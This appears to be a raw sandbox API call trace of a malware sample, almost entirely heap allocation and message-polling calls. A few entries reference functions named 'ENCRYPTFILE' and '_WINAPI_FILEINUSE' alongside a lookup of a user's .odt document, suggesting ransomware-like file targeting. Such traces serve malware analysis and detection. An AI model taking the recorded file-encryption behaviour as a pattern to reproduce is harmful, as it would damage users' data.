HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431daa0 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.504] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0077.504] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0077.505] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.505] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.505] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0077.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2200 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0077.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8970 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0077.506] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.506] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0077.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.507] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\O8- 8r.odt", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fb2180, ftCreationTime.dwHighDateTime=0x1d5e306, ftLastAccessTime.dwLowDateTime=0x7511100, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0x7511100, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x10245, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="O8- 8r.odt", cAlternateFileName="O8-8R~1.ODT")) returned 0x41ac500 [0077.507] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0077.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0077.507] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0077.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0077.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0077.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0077.508] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0077.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0077.508] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0077.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0077.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0077.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0077.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0077.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0077.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0077.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0077.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0077.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0077.511] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0077.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0077.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0077.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0077.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0077.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0077.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0077.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0077.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0077.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) 